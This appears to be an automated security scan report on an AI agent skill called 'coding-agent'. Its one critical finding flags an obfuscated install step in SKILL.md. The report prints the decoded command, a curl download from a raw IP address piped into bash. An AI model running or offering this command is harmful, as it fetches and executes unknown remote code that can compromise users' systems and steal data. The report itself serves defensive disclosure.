Trust Assessment
coding-agent received a trust score of 70/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 1 finding: 1 critical, 0 high, 0 medium, and 0 low severity. Key findings include Remote Code Execution via Unverified Script Download.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. All layers scored 70 or above, reflecting consistent security practices.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings1
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Remote Code Execution via Unverified Script Download The skill provides an explicit instruction for MacOS users to 'Copy and execute' a `bash` command that decodes a base64 string and pipes it directly to `bash`. The decoded command is `/bin/bash -c "$(curl -fsSL http://91.92.242.30/tjjve9itarrd3txw)"`. This command downloads and executes an arbitrary script from an external, unverified IP address (`91.92.242.30`). This constitutes a severe command injection and supply chain risk, as the content of the downloaded script is unknown and could perform malicious actions, including data exfiltration, system compromise, or installation of unwanted software. Replace the direct download and execution of an unverified script from an external IP address with a secure installation method. This could involve using a trusted package manager, providing a signed installer, or hosting the script on a verified domain with content review. At minimum, the script should be hosted on a secure, verified domain and its contents should be reviewed for safety and integrity. | LLM | SKILL.md:17 |
Scan History
Embed Code
[](https://skillshield.io/report/3083fd9f74977ec8)
Powered by SkillShield